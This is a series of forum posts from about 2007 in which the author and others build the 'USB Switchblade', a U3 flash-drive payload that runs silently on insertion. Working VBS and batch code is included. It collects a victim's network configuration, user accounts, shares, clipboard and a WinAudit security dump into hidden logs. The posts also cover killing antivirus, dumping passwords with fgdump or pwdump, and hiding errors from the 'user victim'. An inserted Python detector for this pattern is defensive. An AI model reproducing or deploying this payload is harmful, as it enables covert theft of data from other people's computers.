Posts posted by beakmyn

  1. I'll post once it's finished and tested. Gonzor I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools but if it's something I can do using Native Windows tools then the AV/OS is none the wiser.

    @HarshReality

    The AV is typically killed using AVKill but some Antivirus are immune or will countermeasure

    Safety.txt is one of a couple schemes to keep from scanning yourself. I've typically seen it used in the autorun script not the switchblade script.

    The 2 ways I know to keep from scanning yourself:

    1. checks for presence of file "X"

    2. checks computername/user against list stored in file on U3

    Personally I would go with 1, less of a paper trail, lest you lose your switchblade, but it requires access to the machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting the U3 drive.

  2. So, I'm in process of re-writing the switchblade 'code' into vbs. It's based on GonZor's method so it uses the ###.dat files

    This is so that I can output the data into HTML format (very similar to WinAudit html)

    Now here comes one question/decision. Since vbs is more powerful than a simple batch file I can either

    A. wshell.exec ("net user") which will be very fast and give me a list of users

    B. Use WMI or another technique and get vastly more data

    AccountType Caption Description Disabled Domain FullName LocalAccount Lockout
    Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status

    After doing some testing it appears that as expected wshell.exec is almost instantaneous whereas WMI or another method takes 20 seconds.

    Which would you prefer? I suppose I could just code both and then the user could just put a 1 or 2 in the dat file and I'll run the appropriate one.

  3. Seeing as batch files are wonderful things in and of themselves, this is 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why? Because vbs is much more powerful than batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.

  4. I made some updates to your scripts, nice job btw.

    go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error so I've added to skip a: b: and error handling that just keeps chugging if it hits a problem, better than crashing and posting a dialog to the user victim.

    I've included only what's different otherwise I'm over the max characters for message:

    Set objFSO = CreateObject("Scripting.FileSystemObject") 
    Set objShell = CreateObject("Wscript.Shell")
    Set colDrives = objFSO.Drives
    On Error Resume Next
    
    
    strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
    strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)
    
    For Each objDrive in colDrives
        'ignore floppy drives - reserved by BIOS if they don't exist
        If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
            If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCdrv.dat") Then
                strfd = objDrive.Driveletter & ":"
            End If
            If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCgo.bat") Then
                strU3 = objDrive.Driveletter & ":"
            End If
        End if
    Next
    
    
    
    
    If objFSO.FileExists(strfd & "SystemSRCPL.dat") Then
       objShell.Run strU3 & "SystemSRCgo.bat " & strfd & "," & strU3  & "," & strDate & "," & strTime, 0, False
    
    End If
    
    If objFSO.FileExists(strfd & "SystemSRCU3.dat") Then
       objShell.Run ".LaunchU3.exe -a"
       
    End If

    go.bat

    I've added nircmd to grab the clipboard contents and winaudit (google it)

    :: Props: Setzer1411, Marc, rpk5000
    :: fd = flash partition (writable)
    :: U3 = cdrom partition (readonly)
    @ECHO off
    
    
    
    If %computername%.==. SET computername=computer
    If %username%.==. SET username=None
    
    SET fd=%1System
    SET U3=%2SystemSRC
    
    CD %U3% >NUL
    
    :: SET LOG PATHS
        IF NOT EXIST %fd%Logs%computername% (
            MD %fd%Logs%computername%
            )
    
        SET logdir=%fd%Logs%computername%
        SET log="%fd%Logs%computername%%computername%-[%3-%4].log"
        SET tmplog="%fd%Logs%computername%%computername%_TEMP.log"
        SET include="%fd%SRCInclude
        SET /p eipurl=<"%1SystemSRCIncludeEIP.dat"
        SET /p winaud=<"%1SystemSRCIncludewinaud.dat"
    :: PAYLOAD
    ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
    ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1
    
    IF EXIST %include%0.dat" (
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        ECHO +          [System info]           + >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
            IPCONFIG /all >> %log% 2>&1
    
        Echo +-----------------------------------+  >> %log% 2>&1
        Echo +              Shares               +  >> %log% 2>&1
        Echo +-----------------------------------+  >> %log% 2>&1 
              net share >> %log% 2>&1
        Echo +-----------------------------------+  >> %log% 2>&1
        Echo +              Users                +  >> %log% 2>&1
        Echo +-----------------------------------+  >> %log% 2>&1 
              net user >> %log% 2>&1
        )
        
    
        
    IF EXIST %include%19.dat" (
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        Echo +-----------------------------------+  >> %log% 2>&1
        Echo +            Clipboard              +  >> %log% 2>&1
        Echo +-----------------------------------+  >> %log% 2>&1
              .nircmd.exe clipboard addfile %log%
        )
    
    IF EXIST %include%20.dat" (
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        Echo +-----------------------------------+  >> %log% 2>&1
        Echo +            Win Audit              +  >> %log% 2>&1
        Echo +-----------------------------------+  >> %log% 2>&1
                  ECHO WinAudit saved to %logdir% >> %log% 2>&1
                .WinAudit.exe %winaud% /f=%logdir%WA_%computername%[%3-%4] /f=%logdir%WA_%computername%[%3-%4].txt  >> %log% 2>&1
                  ECHO. >> %log% 2>&1     
        )
        
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    
    :End
        EXIT

    winaud.dat rtfm for winaudit to see what the switches do

    /r=oxutn /o=PDF /m=CA Security Scan

    Also for the EIP I use

    http://checkip.dyndns.org/

    You could use regular expressions to remove the extra HTML

    <html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html>

    but it gets the job done and uses a public server

    Take a look at nircmd if you haven't already it does a lot of nice things with the registry and such. Could automate things more smoothly. It'll also allow you to beep the speaker at frequency and length. 3 quick 2600hz tones at the end of the script could tell you when to pull out. ;)
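
Added example, not part of the original post and not the project's code: a defender-side sketch that flags the process pattern the go.bat above produces, namely a script host or cmd.exe running a .bat/.vbs from a non-system drive and then issuing `ipconfig /all`, `net share`, `net user` and the nircmd clipboard call in quick succession. The pipe-delimited log layout, the drive letters and paths, the assumption that C: is the system drive, and the 60-second / 3-category thresholds are all constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records: timestamp|parent command line|command line.
# The layout, drive letters and paths are assumptions made for this example.
SAMPLE = r"""
2007-03-01T10:15:02|wscript.exe E:\autorun.vbs|cmd.exe /c E:\go.bat F:,E:,20070301,101502
2007-03-01T10:15:03|cmd.exe /c E:\go.bat F:,E:,20070301,101502|ipconfig /all
2007-03-01T10:15:04|cmd.exe /c E:\go.bat F:,E:,20070301,101502|net share
2007-03-01T10:15:04|cmd.exe /c E:\go.bat F:,E:,20070301,101502|net user
2007-03-01T10:15:06|cmd.exe /c E:\go.bat F:,E:,20070301,101502|nircmd.exe clipboard addfile F:\out.log
2007-03-01T11:40:10|explorer.exe|cmd.exe
2007-03-01T11:40:30|cmd.exe|ipconfig /all
"""

# Commands the posted go.bat runs, grouped into categories.
RECON = {
    "ipconfig": re.compile(r"\bipconfig(\.exe)?\s+/all\b", re.I),
    "net share": re.compile(r"\bnet1?(\.exe)?\s+share\b", re.I),
    "net user": re.compile(r"\bnet1?(\.exe)?\s+user\b", re.I),
    "clipboard": re.compile(r"\bnircmd(\.exe)?\s+clipboard\b", re.I),
    "winaudit": re.compile(r"\bwinaudit(\.exe)?\b", re.I),
}
# Parent is cmd/wscript/cscript running a script from a drive other than C:
# (assumed to be the system drive).
SCRIPT_PARENT = re.compile(
    r"\b(cmd|wscript|cscript)(\.exe)?\b.*\b(?!C:)[A-Z]:\\\S+\.(bat|cmd|vbs)\b", re.I)

def detect(log_text, window=timedelta(seconds=60), threshold=3):
    """Return [(parent, categories)] where one off-drive script parent
    spawned >= threshold distinct recon categories inside the window."""
    groups = {}
    for line in log_text.strip().splitlines():
        ts, parent, cmd = line.split("|", 2)
        if not SCRIPT_PARENT.search(parent):
            continue  # an interactive shell or a C: script is out of scope here
        hits = [name for name, rx in RECON.items() if rx.search(cmd)]
        groups.setdefault(parent, []).extend(
            (datetime.fromisoformat(ts), name) for name in hits)
    alerts = []
    for parent, events in groups.items():
        events.sort()
        for i, (start, _) in enumerate(events):  # sliding window start
            seen = sorted({n for t, n in events[i:] if t - start <= window})
            if len(seen) >= threshold:
                alerts.append((parent, seen))
                break
    return alerts
```

The lone `ipconfig /all` typed into an interactive cmd.exe in the sample is deliberately not flagged; only the burst under one script parent is.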

  5. Found the following issues

    | was being used as a piped command where I think your intention was for it to be a pipe character.

    If you have a multi-card usb hub or other usb holder with no disk, the for loop will cause errors to be displayed to the user about "no disk present" abort,retry,fail

    Count script sometimes returns "volume in drive d is removable" (where d is variable) this screws up the file name and you get

    computername - [volume in drive d is removable].log

    I'm investigating root cause.

  6. In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)

    SET include="G:SRCInclude
    
    IF EXIST %include%0.dat"
    

    When the second line is expanded it will look like this

    "G:SRCInclude0.dat"

    Note the " on either end, If I were to enclose each in " like so

    SET include="G:SRCInclude"
    
    IF EXIST "%include%0.dat"
    

    When the second line is expanded it will look like this, and fail

    ""G:SRCInclude"0.dat"

    To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.

    Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep.

    I'm doing some tweaks to it now and compiling the batch files to executables, etc.

    I'd love to take a look at the tweaks you've made, as well as the executable. What language?

    It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some cases 3 ", which is what I expected to see in your code. But that tends to muck things up so instead I'll use chr(34) or equivalent and concatenation.

    I guess the batch file environment is more forgiving being an interpreted language but it makes the syntax highlighting in ExeScript goofing.

    That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with an exe wrapper. Not a real executable, yet.

    One thing I've done is changed the layout for the log file:

    ECHO +-----------------------------------+ >> %log% 2>&1
    ECHO |          [System info]            | >> %log% 2>&1
    ECHO +-----------------------------------+ >> %log% 2>&1

    I find the above easier on the eyes than the old ***** method

    I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when it's done.

    The one thing I do like is that you still have launchpad functionality and the tools are on the CDROM partition rather than flash. I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead.

  7. Nice job! I'm doing some tweaks to it now and compiling the batch files to executables, etc.  But one thing struck me as odd and most likely it's my relatively vacant use of batch files.  You seem to use the " mark singularly.

    such as:

    SET U3="%%i:SRC 

    or

    IF EXIST %include%1.dat" (

    What is the reason for this? typically I've seen the use of the as an escape character and I'm used to seeing the " being used in pairs to enclose items with spaces or use literal meaning. 

    Just curious.
